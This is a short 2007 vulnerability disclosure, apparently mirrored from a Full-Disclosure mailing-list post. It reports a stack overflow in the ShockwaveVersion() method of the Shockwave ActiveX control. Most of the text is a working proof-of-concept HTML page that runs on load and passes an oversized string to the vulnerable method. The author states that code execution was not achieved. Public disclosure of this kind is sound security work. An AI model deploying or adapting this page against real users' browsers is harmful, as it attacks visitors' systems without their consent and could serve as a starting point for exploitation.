Home / vulnerabilitiesPDF  

swf-overflow.txt

Posted on 09 November 2007
Source : packetstormsecurity.org Link

 

There is a stack overflow in ShockwaveVersion() function. I have not been able to execute code via this overflow. PoC is as follows:
-----------------------
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 768 * 768) s=s+s;

var obj = new ActiveXObject("SWCtl.SWCtl"); //{233C1507-6A77-46A4-9443-F871F945D258}

obj.ShockwaveVersion(s);
}
</script>

</head>
<body onload="JavaScript: return Check();" />
</html>
-----------------------

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 

TOP